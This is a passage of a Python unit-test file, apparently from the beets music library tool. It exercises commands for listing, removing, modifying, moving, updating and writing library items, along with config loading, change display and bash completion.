def test_list_album_format(self):
stdout = self._run_list(album=True, fmt=u'$genre')
self.assertIn(u'the genre', stdout.getvalue())
self.assertNotIn(u'the album', stdout.getvalue())
class RemoveTest(_common.TestCase):
def setUp(self):
super(RemoveTest, self).setUp()
self.io.install()
self.libdir = os.path.join(self.temp_dir, b'testlibdir')
os.mkdir(self.libdir)
# Copy a file into the library.
self.lib = library.Library(':memory:', self.libdir)
item_path = os.path.join(_common.RSRC, b'full.mp3')
self.i = library.Item.from_path(item_path)
self.lib.add(self.i)
self.i.move(True)
def test_remove_items_no_delete(self):
self.io.addinput('y')
commands.remove_items(self.lib, u'', False, False, False)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertTrue(os.path.exists(self.i.path))
def test_remove_items_with_delete(self):
self.io.addinput('y')
commands.remove_items(self.lib, u'', False, True, False)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertFalse(os.path.exists(self.i.path))
def test_remove_items_with_force_no_delete(self):
commands.remove_items(self.lib, u'', False, False, True)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertTrue(os.path.exists(self.i.path))
def test_remove_items_with_force_delete(self):
commands.remove_items(self.lib, u'', False, True, True)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertFalse(os.path.exists(self.i.path))
class ModifyTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.album = self.add_album_fixture()
[self.item] = self.album.items()
def tearDown(self):
self.teardown_beets()
def modify_inp(self, inp, *args):
with control_stdin(inp):
self.run_command('modify', *args)
def modify(self, *args):
self.modify_inp('y', *args)
# Item tests
def test_modify_item(self):
self.modify(u"title=newTitle")
item = self.lib.items().get()
self.assertEqual(item.title, u'newTitle')
def test_modify_item_abort(self):
item = self.lib.items().get()
title = item.title
self.modify_inp('n', u"title=newTitle")
item = self.lib.items().get()
self.assertEqual(item.title, title)
def test_modify_item_no_change(self):
title = u"Tracktitle"
item = self.add_item_fixture(title=title)
self.modify_inp('y', u"title", u"title={0}".format(title))
item = self.lib.items(title).get()
self.assertEqual(item.title, title)
def test_modify_write_tags(self):
self.modify(u"title=newTitle")
item = self.lib.items().get()
item.read()
self.assertEqual(item.title, u'newTitle')
def test_modify_dont_write_tags(self):
self.modify(u"--nowrite", u"title=newTitle")
item = self.lib.items().get()
item.read()
self.assertNotEqual(item.title, 'newTitle')
def test_move(self):
self.modify(u"title=newTitle")
item = self.lib.items().get()
self.assertIn(b'newTitle', item.path)
def test_not_move(self):
self.modify(u"--nomove", u"title=newTitle")
item = self.lib.items().get()
self.assertNotIn(b'newTitle', item.path)
def test_no_write_no_move(self):
self.modify(u"--nomove", u"--nowrite", u"title=newTitle")
item = self.lib.items().get()
item.read()
self.assertNotIn(b'newTitle', item.path)
self.assertNotEqual(item.title, u'newTitle')
def test_update_mtime(self):
item = self.item
old_mtime = item.mtime
self.modify(u"title=newTitle")
item.load()
self.assertNotEqual(old_mtime, item.mtime)
self.assertEqual(item.current_mtime(), item.mtime)
def test_reset_mtime_with_no_write(self):
item = self.item
self.modify(u"--nowrite", u"title=newTitle")
item.load()
self.assertEqual(0, item.mtime)
def test_selective_modify(self):
title = u"Tracktitle"
album = u"album"
original_artist = u"composer"
new_artist = u"coverArtist"
for i in range(0, 10):
self.add_item_fixture(title=u"{0}{1}".format(title, i),
artist=original_artist,
album=album)
self.modify_inp('s\ny\ny\ny\nn\nn\ny\ny\ny\ny\nn',
title, u"artist={0}".format(new_artist))
original_items = self.lib.items(u"artist:{0}".format(original_artist))
new_items = self.lib.items(u"artist:{0}".format(new_artist))
self.assertEqual(len(list(original_items)), 3)
self.assertEqual(len(list(new_items)), 7)
# Album Tests
def test_modify_album(self):
self.modify(u"--album", u"album=newAlbum")
album = self.lib.albums().get()
self.assertEqual(album.album, u'newAlbum')
def test_modify_album_write_tags(self):
self.modify(u"--album", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertEqual(item.album, u'newAlbum')
def test_modify_album_dont_write_tags(self):
self.modify(u"--album", u"--nowrite", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertEqual(item.album, u'the album')
def test_album_move(self):
self.modify(u"--album", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertIn(b'newAlbum', item.path)
def test_album_not_move(self):
self.modify(u"--nomove", u"--album", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertNotIn(b'newAlbum', item.path)
# Misc
def test_write_initial_key_tag(self):
self.modify(u"initial_key=C#m")
item = self.lib.items().get()
mediafile = MediaFile(syspath(item.path))
self.assertEqual(mediafile.initial_key, u'C#m')
def test_set_flexattr(self):
self.modify(u"flexattr=testAttr")
item = self.lib.items().get()
self.assertEqual(item.flexattr, u'testAttr')
def test_remove_flexattr(self):
item = self.lib.items().get()
item.flexattr = u'testAttr'
item.store()
self.modify(u"flexattr!")
item = self.lib.items().get()
self.assertNotIn(u"flexattr", item)
@unittest.skip(u'not yet implemented')
def test_delete_initial_key_tag(self):
item = self.lib.items().get()
item.initial_key = u'C#m'
item.write()
item.store()
mediafile = MediaFile(syspath(item.path))
self.assertEqual(mediafile.initial_key, u'C#m')
self.modify(u"initial_key!")
mediafile = MediaFile(syspath(item.path))
self.assertIsNone(mediafile.initial_key)
def test_arg_parsing_colon_query(self):
(query, mods, dels) = commands.modify_parse_args([u"title:oldTitle",
u"title=newTitle"])
self.assertEqual(query, [u"title:oldTitle"])
self.assertEqual(mods, {"title": u"newTitle"})
def test_arg_parsing_delete(self):
(query, mods, dels) = commands.modify_parse_args([u"title:oldTitle",
u"title!"])
self.assertEqual(query, [u"title:oldTitle"])
self.assertEqual(dels, ["title"])
def test_arg_parsing_query_with_exclaimation(self):
(query, mods, dels) = commands.modify_parse_args([u"title:oldTitle!",
u"title=newTitle!"])
self.assertEqual(query, [u"title:oldTitle!"])
self.assertEqual(mods, {"title": u"newTitle!"})
def test_arg_parsing_equals_in_value(self):
(query, mods, dels) = commands.modify_parse_args([u"title:foo=bar",
u"title=newTitle"])
self.assertEqual(query, [u"title:foo=bar"])
self.assertEqual(mods, {"title": u"newTitle"})
class WriteTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
def tearDown(self):
self.teardown_beets()
def write_cmd(self, *args):
return self.run_with_output('write', *args)
def test_update_mtime(self):
item = self.add_item_fixture()
item['title'] = u'a new title'
item.store()
item = self.lib.items().get()
self.assertEqual(item.mtime, 0)
self.write_cmd()
item = self.lib.items().get()
self.assertEqual(item.mtime, item.current_mtime())
def test_non_metadata_field_unchanged(self):
"""Changing a non-"tag" field like `bitrate` and writing should
have no effect.
"""
# An item that starts out "clean".
item = self.add_item_fixture()
item.read()
# ... but with a mismatched bitrate.
item.bitrate = 123
item.store()
output = self.write_cmd()
self.assertEqual(output, '')
def test_write_metadata_field(self):
item = self.add_item_fixture()
item.read()
old_title = item.title
item.title = u'new title'
item.store()
output = self.write_cmd()
self.assertTrue(u'{0} -> new title'.format(old_title)
in output)
class MoveTest(_common.TestCase):
def setUp(self):
super(MoveTest, self).setUp()
self.io.install()
self.libdir = os.path.join(self.temp_dir, b'testlibdir')
os.mkdir(self.libdir)
self.itempath = os.path.join(self.libdir, b'srcfile')
shutil.copy(os.path.join(_common.RSRC, b'full.mp3'), self.itempath)
# Add a file to the library but don't copy it in yet.
self.lib = library.Library(':memory:', self.libdir)
self.i = library.Item.from_path(self.itempath)
self.lib.add(self.i)
self.album = self.lib.add_album([self.i])
# Alternate destination directory.
self.otherdir = os.path.join(self.temp_dir, b'testotherdir')
def _move(self, query=(), dest=None, copy=False, album=False,
pretend=False, export=False):
commands.move_items(self.lib, dest, query, copy, album, pretend,
export=export)
def test_move_item(self):
self._move()
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_copy_item(self):
self._move(copy=True)
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertExists(self.itempath)
def test_move_album(self):
self._move(album=True)
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_copy_album(self):
self._move(copy=True, album=True)
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertExists(self.itempath)
def test_move_item_custom_dir(self):
self._move(dest=self.otherdir)
self.i.load()
self.assertTrue(b'testotherdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_move_album_custom_dir(self):
self._move(dest=self.otherdir, album=True)
self.i.load()
self.assertTrue(b'testotherdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_pretend_move_item(self):
self._move(dest=self.otherdir, pretend=True)
self.i.load()
self.assertIn(b'srcfile', self.i.path)
def test_pretend_move_album(self):
self._move(album=True, pretend=True)
self.i.load()
self.assertIn(b'srcfile', self.i.path)
def test_export_item_custom_dir(self):
self._move(dest=self.otherdir, export=True)
self.i.load()
self.assertEqual(self.i.path, self.itempath)
self.assertExists(self.otherdir)
def test_export_album_custom_dir(self):
self._move(dest=self.otherdir, album=True, export=True)
self.i.load()
self.assertEqual(self.i.path, self.itempath)
self.assertExists(self.otherdir)
def test_pretend_export_item(self):
self._move(dest=self.otherdir, pretend=True, export=True)
self.i.load()
self.assertIn(b'srcfile', self.i.path)
self.assertNotExists(self.otherdir)
class UpdateTest(_common.TestCase):
def setUp(self):
super(UpdateTest, self).setUp()
self.io.install()
self.libdir = os.path.join(self.temp_dir, b'testlibdir')
# Copy a file into the library.
self.lib = library.Library(':memory:', self.libdir)
item_path = os.path.join(_common.RSRC, b'full.mp3')
self.i = library.Item.from_path(item_path)
self.lib.add(self.i)
self.i.move(True)
self.album = self.lib.add_album([self.i])
# Album art.
artfile = os.path.join(self.temp_dir, b'testart.jpg')
_common.touch(artfile)
self.album.set_art(artfile)
self.album.store()
os.remove(artfile)
def _update(self, query=(), album=False, move=False, reset_mtime=True,
fields=None):
self.io.addinput('y')
if reset_mtime:
self.i.mtime = 0
self.i.store()
commands.update_items(self.lib, query, album, move, False,
fields=fields)
def test_delete_removes_item(self):
self.assertTrue(list(self.lib.items()))
os.remove(self.i.path)
self._update()
self.assertFalse(list(self.lib.items()))
def test_delete_removes_album(self):
self.assertTrue(self.lib.albums())
os.remove(self.i.path)
self._update()
self.assertFalse(self.lib.albums())
def test_delete_removes_album_art(self):
artpath = self.album.artpath
self.assertExists(artpath)
os.remove(self.i.path)
self._update()
self.assertNotExists(artpath)
def test_modified_metadata_detected(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
self._update()
item = self.lib.items().get()
self.assertEqual(item.title, u'differentTitle')
def test_modified_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
self._update(move=True)
item = self.lib.items().get()
self.assertTrue(b'differentTitle' in item.path)
def test_modified_metadata_not_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
self._update(move=False)
item = self.lib.items().get()
self.assertTrue(b'differentTitle' not in item.path)
def test_selective_modified_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.genre = u'differentGenre'
mf.save()
self._update(move=True, fields=['title'])
item = self.lib.items().get()
self.assertTrue(b'differentTitle' in item.path)
self.assertNotEqual(item.genre, u'differentGenre')
def test_selective_modified_metadata_not_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.genre = u'differentGenre'
mf.save()
self._update(move=False, fields=['title'])
item = self.lib.items().get()
self.assertTrue(b'differentTitle' not in item.path)
self.assertNotEqual(item.genre, u'differentGenre')
def test_modified_album_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.save()
self._update(move=True)
item = self.lib.items().get()
self.assertTrue(b'differentAlbum' in item.path)
def test_modified_album_metadata_art_moved(self):
artpath = self.album.artpath
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.save()
self._update(move=True)
album = self.lib.albums()[0]
self.assertNotEqual(artpath, album.artpath)
def test_selective_modified_album_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.genre = u'differentGenre'
mf.save()
self._update(move=True, fields=['album'])
item = self.lib.items().get()
self.assertTrue(b'differentAlbum' in item.path)
self.assertNotEqual(item.genre, u'differentGenre')
def test_selective_modified_album_metadata_not_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.genre = u'differentGenre'
mf.save()
self._update(move=True, fields=['genre'])
item = self.lib.items().get()
self.assertTrue(b'differentAlbum' not in item.path)
self.assertEqual(item.genre, u'differentGenre')
def test_mtime_match_skips_update(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
# Make in-memory mtime match on-disk mtime.
self.i.mtime = os.path.getmtime(self.i.path)
self.i.store()
self._update(reset_mtime=False)
item = self.lib.items().get()
self.assertEqual(item.title, u'full')
class PrintTest(_common.TestCase):
def setUp(self):
super(PrintTest, self).setUp()
self.io.install()
def test_print_without_locale(self):
lang = os.environ.get('LANG')
if lang:
del os.environ['LANG']
try:
ui.print_(u'something')
except TypeError:
self.fail(u'TypeError during print')
finally:
if lang:
os.environ['LANG'] = lang
def test_print_with_invalid_locale(self):
old_lang = os.environ.get('LANG')
os.environ['LANG'] = ''
old_ctype = os.environ.get('LC_CTYPE')
os.environ['LC_CTYPE'] = 'UTF-8'
try:
ui.print_(u'something')
except ValueError:
self.fail(u'ValueError during print')
finally:
if old_lang:
os.environ['LANG'] = old_lang
else:
del os.environ['LANG']
if old_ctype:
os.environ['LC_CTYPE'] = old_ctype
else:
del os.environ['LC_CTYPE']
class ImportTest(_common.TestCase):
def test_quiet_timid_disallowed(self):
config['import']['quiet'] = True
config['import']['timid'] = True
self.assertRaises(ui.UserError, commands.import_files, None, [],
None)
@_common.slow_test()
class ConfigTest(unittest.TestCase, TestHelper, _common.Assertions):
def setUp(self):
self.setup_beets()
# Don't use the BEETSDIR from `helper`. Instead, we point the home
# directory there. Some tests will set `BEETSDIR` themselves.
del os.environ['BEETSDIR']
self._old_home = os.environ.get('HOME')
os.environ['HOME'] = util.py3_path(self.temp_dir)
# Also set APPDATA, the Windows equivalent of setting $HOME.
self._old_appdata = os.environ.get('APPDATA')
os.environ['APPDATA'] = \
util.py3_path(os.path.join(self.temp_dir, b'AppData', b'Roaming'))
self._orig_cwd = os.getcwd()
self.test_cmd = self._make_test_cmd()
commands.default_commands.append(self.test_cmd)
# Default user configuration
if platform.system() == 'Windows':
self.user_config_dir = os.path.join(
self.temp_dir, b'AppData', b'Roaming', b'beets'
)
else:
self.user_config_dir = os.path.join(
self.temp_dir, b'.config', b'beets'
)
os.makedirs(self.user_config_dir)
self.user_config_path = os.path.join(self.user_config_dir,
b'config.yaml')
# Custom BEETSDIR
self.beetsdir = os.path.join(self.temp_dir, b'beetsdir')
os.makedirs(self.beetsdir)
self._reset_config()
def tearDown(self):
commands.default_commands.pop()
os.chdir(self._orig_cwd)
if self._old_home is not None:
os.environ['HOME'] = self._old_home
if self._old_appdata is None:
del os.environ['APPDATA']
else:
os.environ['APPDATA'] = self._old_appdata
self.teardown_beets()
def _make_test_cmd(self):
test_cmd = ui.Subcommand('test', help=u'test')
def run(lib, options, args):
test_cmd.lib = lib
test_cmd.options = options
test_cmd.args = args
test_cmd.func = run
return test_cmd
def _reset_config(self):
# Config should read files again on demand
config.clear()
config._materialized = False
def write_config_file(self):
return open(self.user_config_path, 'w')
def test_paths_section_respected(self):
with self.write_config_file() as config:
config.write('paths: {x: y}')
self.run_command('test', lib=None)
key, template = self.test_cmd.lib.path_formats[0]
self.assertEqual(key, 'x')
self.assertEqual(template.original, 'y')
def test_default_paths_preserved(self):
default_formats = ui.get_path_formats()
self._reset_config()
with self.write_config_file() as config:
config.write('paths: {x: y}')
self.run_command('test', lib=None)
key, template = self.test_cmd.lib.path_formats[0]
self.assertEqual(key, 'x')
self.assertEqual(template.original, 'y')
self.assertEqual(self.test_cmd.lib.path_formats[1:],
default_formats)
def test_nonexistant_db(self):
with self.write_config_file() as config:
config.write('library: /xxx/yyy/not/a/real/path')
with self.assertRaises(ui.UserError):
self.run_command('test', lib=None)
def test_user_config_file(self):
with self.write_config_file() as file:
file.write('anoption: value')
self.run_command('test', lib=None)
self.assertEqual(config['anoption'].get(), 'value')
def test_replacements_parsed(self):
with self.write_config_file() as config:
config.write("replace: {'[xy]': z}")
self.run_command('test', lib=None)
replacements = self.test_cmd.lib.replacements
self.assertEqual(replacements, [(re.compile(u'[xy]'), 'z')])
def test_multiple_replacements_parsed(self):
with self.write_config_file() as config:
config.write("replace: {'[xy]': z, foo: bar}")
self.run_command('test', lib=None)
replacements = self.test_cmd.lib.replacements
self.assertEqual(replacements, [
(re.compile(u'[xy]'), u'z'),
(re.compile(u'foo'), u'bar'),
])
def test_cli_config_option(self):
config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(config_path, 'w') as file:
file.write('anoption: value')
self.run_command('--config', config_path, 'test', lib=None)
self.assertEqual(config['anoption'].get(), 'value')
def test_cli_config_file_overwrites_user_defaults(self):
with open(self.user_config_path, 'w') as file:
file.write('anoption: value')
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('anoption: cli overwrite')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assertEqual(config['anoption'].get(), 'cli overwrite')
def test_cli_config_file_overwrites_beetsdir_defaults(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
env_config_path = os.path.join(self.beetsdir, b'config.yaml')
with open(env_config_path, 'w') as file:
file.write('anoption: value')
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('anoption: cli overwrite')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assertEqual(config['anoption'].get(), 'cli overwrite')
# @unittest.skip('Difficult to implement with optparse')
# def test_multiple_cli_config_files(self):
# cli_config_path_1 = os.path.join(self.temp_dir, b'config.yaml')
# cli_config_path_2 = os.path.join(self.temp_dir, b'config_2.yaml')
#
# with open(cli_config_path_1, 'w') as file:
# file.write('first: value')
#
# with open(cli_config_path_2, 'w') as file:
# file.write('second: value')
#
# self.run_command('--config', cli_config_path_1,
# '--config', cli_config_path_2, 'test', lib=None)
# self.assertEqual(config['first'].get(), 'value')
# self.assertEqual(config['second'].get(), 'value')
#
# @unittest.skip('Difficult to implement with optparse')
# def test_multiple_cli_config_overwrite(self):
# cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
# cli_overwrite_config_path = os.path.join(self.temp_dir,
# b'overwrite_config.yaml')
#
# with open(cli_config_path, 'w') as file:
# file.write('anoption: value')
#
# with open(cli_overwrite_config_path, 'w') as file:
# file.write('anoption: overwrite')
#
# self.run_command('--config', cli_config_path,
# '--config', cli_overwrite_config_path, 'test')
# self.assertEqual(config['anoption'].get(), 'cli overwrite')
def test_cli_config_paths_resolve_relative_to_user_dir(self):
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('library: beets.db\n')
file.write('statefile: state')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.user_config_dir, b'beets.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.user_config_dir, b'state')
)
def test_cli_config_paths_resolve_relative_to_beetsdir(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('library: beets.db\n')
file.write('statefile: state')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.beetsdir, b'beets.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.beetsdir, b'state')
)
def test_command_line_option_relative_to_working_dir(self):
os.chdir(self.temp_dir)
self.run_command('--library', 'foo.db', 'test', lib=None)
self.assert_equal_path(config['library'].as_filename(),
os.path.join(os.getcwd(), 'foo.db'))
def test_cli_config_file_loads_plugin_commands(self):
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('pluginpath: %s\n' % _common.PLUGINPATH)
file.write('plugins: test')
self.run_command('--config', cli_config_path, 'plugin', lib=None)
self.assertTrue(plugins.find_plugins()[0].is_test_plugin)
def test_beetsdir_config(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
env_config_path = os.path.join(self.beetsdir, b'config.yaml')
with open(env_config_path, 'w') as file:
file.write('anoption: overwrite')
config.read()
self.assertEqual(config['anoption'].get(), 'overwrite')
def test_beetsdir_points_to_file_error(self):
beetsdir = os.path.join(self.temp_dir, b'beetsfile')
open(beetsdir, 'a').close()
os.environ['BEETSDIR'] = util.py3_path(beetsdir)
self.assertRaises(ConfigError, self.run_command, 'test')
def test_beetsdir_config_does_not_load_default_user_config(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
with open(self.user_config_path, 'w') as file:
file.write('anoption: value')
config.read()
self.assertFalse(config['anoption'].exists())
def test_default_config_paths_resolve_relative_to_beetsdir(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
config.read()
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.beetsdir, b'library.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.beetsdir, b'state.pickle')
)
def test_beetsdir_config_paths_resolve_relative_to_beetsdir(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
env_config_path = os.path.join(self.beetsdir, b'config.yaml')
with open(env_config_path, 'w') as file:
file.write('library: beets.db\n')
file.write('statefile: state')
config.read()
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.beetsdir, b'beets.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.beetsdir, b'state')
)
class ShowModelChangeTest(_common.TestCase):
def setUp(self):
super(ShowModelChangeTest, self).setUp()
self.io.install()
self.a = _common.item()
self.b = _common.item()
self.a.path = self.b.path
def _show(self, **kwargs):
change = ui.show_model_changes(self.a, self.b, **kwargs)
out = self.io.getoutput()
return change, out
def test_identical(self):
change, out = self._show()
self.assertFalse(change)
self.assertEqual(out, '')
def test_string_fixed_field_change(self):
self.b.title = 'x'
change, out = self._show()
self.assertTrue(change)
self.assertTrue(u'title' in out)
def test_int_fixed_field_change(self):
self.b.track = 9
change, out = self._show()
self.assertTrue(change)
self.assertTrue(u'track' in out)
def test_floats_close_to_identical(self):
self.a.length = 1.00001
self.b.length = 1.00005
change, out = self._show()
self.assertFalse(change)
self.assertEqual(out, u'')
def test_floats_different(self):
self.a.length = 1.00001
self.b.length = 2.00001
change, out = self._show()
self.assertTrue(change)
self.assertTrue(u'length' in out)
def test_both_values_shown(self):
self.a.title = u'foo'
self.b.title = u'bar'
change, out = self._show()
self.assertTrue(u'foo' in out)
self.assertTrue(u'bar' in out)
class ShowChangeTest(_common.TestCase):
def setUp(self):
super(ShowChangeTest, self).setUp()
self.io.install()
self.items = [_common.item()]
self.items[0].track = 1
self.items[0].path = b'/path/to/file.mp3'
self.info = autotag.AlbumInfo(
u'the album', u'album id', u'the artist', u'artist id', [
autotag.TrackInfo(u'the title', u'track id', index=1)
]
)
def _show_change(self, items=None, info=None,
cur_artist=u'the artist', cur_album=u'the album',
dist=0.1):
"""Return an unicode string representing the changes"""
items = items or self.items
info = info or self.info
mapping = dict(zip(items, info.tracks))
config['ui']['color'] = False
album_dist = distance(items, info, mapping)
album_dist._penalties = {'album': [dist]}
commands.show_change(
cur_artist,
cur_album,
autotag.AlbumMatch(album_dist, info, mapping, set(), set()),
)
# FIXME decoding shouldn't be done here
return util.text_string(self.io.getoutput().lower())
def test_null_change(self):
msg = self._show_change()
self.assertTrue('similarity: 90' in msg)
self.assertTrue('tagging:' in msg)
def test_album_data_change(self):
msg = self._show_change(cur_artist='another artist',
cur_album='another album')
self.assertTrue('correcting tags from:' in msg)
def test_item_data_change(self):
self.items[0].title = u'different'
msg = self._show_change()
self.assertTrue('different -> the title' in msg)
def test_item_data_change_with_unicode(self):
self.items[0].title = u'caf\xe9'
msg = self._show_change()
self.assertTrue(u'caf\xe9 -> the title' in msg)
def test_album_data_change_with_unicode(self):
msg = self._show_change(cur_artist=u'caf\xe9',
cur_album=u'another album')
self.assertTrue(u'correcting tags from:' in msg)
def test_item_data_change_title_missing(self):
self.items[0].title = u''
msg = re.sub(r' +', ' ', self._show_change())
self.assertTrue(u'file.mp3 -> the title' in msg)
def test_item_data_change_title_missing_with_unicode_filename(self):
self.items[0].title = u''
self.items[0].path = u'/path/to/caf\xe9.mp3'.encode('utf-8')
msg = re.sub(r' +', ' ', self._show_change())
self.assertTrue(u'caf\xe9.mp3 -> the title' in msg or
u'caf.mp3 ->' in msg)
@patch('beets.library.Item.try_filesize', Mock(return_value=987))
class SummarizeItemsTest(_common.TestCase):
def setUp(self):
super(SummarizeItemsTest, self).setUp()
item = library.Item()
item.bitrate = 4321
item.length = 10 * 60 + 54
item.format = "F"
self.item = item
def test_summarize_item(self):
summary = commands.summarize_items([], True)
self.assertEqual(summary, u"")
summary = commands.summarize_items([self.item], True)
self.assertEqual(summary, u"F, 4kbps, 10:54, 987.0 B")
def test_summarize_items(self):
summary = commands.summarize_items([], False)
self.assertEqual(summary, u"0 items")
summary = commands.summarize_items([self.item], False)
self.assertEqual(summary, u"1 items, F, 4kbps, 10:54, 987.0 B")
i2 = deepcopy(self.item)
summary = commands.summarize_items([self.item, i2], False)
self.assertEqual(summary, u"2 items, F, 4kbps, 21:48, 1.9 KiB")
i2.format = "G"
summary = commands.summarize_items([self.item, i2], False)
self.assertEqual(summary, u"2 items, F 1, G 1, 4kbps, 21:48, 1.9 KiB")
summary = commands.summarize_items([self.item, i2, i2], False)
self.assertEqual(summary, u"3 items, G 2, F 1, 4kbps, 32:42, 2.9 KiB")
class PathFormatTest(_common.TestCase):
def test_custom_paths_prepend(self):
default_formats = ui.get_path_formats()
config['paths'] = {u'foo': u'bar'}
pf = ui.get_path_formats()
key, tmpl = pf[0]
self.assertEqual(key, u'foo')
self.assertEqual(tmpl.original, u'bar')
self.assertEqual(pf[1:], default_formats)
@_common.slow_test()
class PluginTest(_common.TestCase, TestHelper):
def test_plugin_command_from_pluginpath(self):
config['pluginpath'] = [_common.PLUGINPATH]
config['plugins'] = ['test']
self.run_command('test', lib=None)
@_common.slow_test()
class CompletionTest(_common.TestCase, TestHelper):
def test_completion(self):
# Load plugin commands
config['pluginpath'] = [_common.PLUGINPATH]
config['plugins'] = ['test']
# Do not load any other bash completion scripts on the system.
env = dict(os.environ)
env['BASH_COMPLETION_DIR'] = os.devnull
env['BASH_COMPLETION_COMPAT_DIR'] = os.devnull
# Open a `bash` process to run the tests in. We'll pipe in bash
# commands via stdin.
cmd = os.environ.get('BEETS_TEST_SHELL', '/bin/bash --norc').split()
if not has_program(cmd[0]):
self.skipTest(u'bash not available')
tester = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, env=env)
# Load bash_completion library.
for path in commands.BASH_COMPLETION_PATHS:
if os.path.exists(util.syspath(path)):
bash_completion = path
break
else:
self.skipTest(u'bash-completion script not found')
try:
with open(util.syspath(bash_completion), 'rb') as f:
tester.stdin.writelines(f)
except IOError:
self.skipTest(u'could not read bash-completion script')
# Load completion script.
self.io.install()
self.run_command('completion', lib=None)
completion_script = self.io.getoutput().encode('utf-8')
self.io.restore()
tester.stdin.writelines(completion_script.splitlines(True))
# Load test suite.
test_script_name = os.path.join(_common.RSRC, b'test_completion.sh')
with open(test_script_name, 'rb') as test_script_file:
tester.stdin.writelines(test_script_file)
out, err = tester.communicate()
if tester.returncode != 0 or out != b'completion tests passed\n':
print(out.decode('utf-8'))
self.fail(u'test/test_completion.sh did not execute properly')
class CommonOptionsParserCliTest(unittest.TestCase, TestHelper):
"""Test CommonOptionsParser and formatting LibModel formatting on 'list'
command.
"""
def setUp(self):
self.setup_beets()
self.lib = library.Library(':memory:')
self.item = _common.item()
self.item.path = b'xxx/yyy'
self.lib.add(self.item)
self.lib.add_album([self.item])
def tearDown(self):
self.teardown_beets()
def test_base(self):
l = self.run_with_output(u'ls')
self.assertEqual(l, u'the artist - the album - the title\n')
l = self.run_with_output(u'ls', u'-a')
self.assertEqual(l, u'the album artist - the album\n')
def test_path_option(self):
l = self.run_with_output(u'ls', u'-p')
self.assertEqual(l, u'xxx/yyy\n')
l = self.run_with_output(u'ls', u'-a', u'-p')
self.assertEqual(l, u'xxx\n')
def test_format_option(self):
l = self.run_with_output(u'ls', u'-f', u'$artist')
self.assertEqual(l, u'the artist\n')
l = self.run_with_output(u'ls', u'-a', u'-f', u'$albumartist')
self.assertEqual(l, u'the album artist\n')
def test_format_option_unicode(self):
l = self.run_with_output(b'ls', b'-f',
u'caf\xe9'.encode(util.arg_encoding()))
self.assertEqual(l, u'caf\xe9\n')
def test_root_format_option(self):
l = self.run_with_output(u'--format-item', u'$artist',
u'--format-album', u'foo', u'ls')
self.assertEqual(l, u'the artist\n')
l = self.run_with_output(u'--format-item', u'foo',
u'--format-album', u'$albumartist',
u'ls', u'-a')
self.assertEqual(l, u'the album artist\n')
def test_help(self):
l = self.run_with_output(u'help')
self.assertIn(u'Usage:', l)
l = self.run_with_output(u'help', u'list')
self.assertIn(u'Usage:', l)
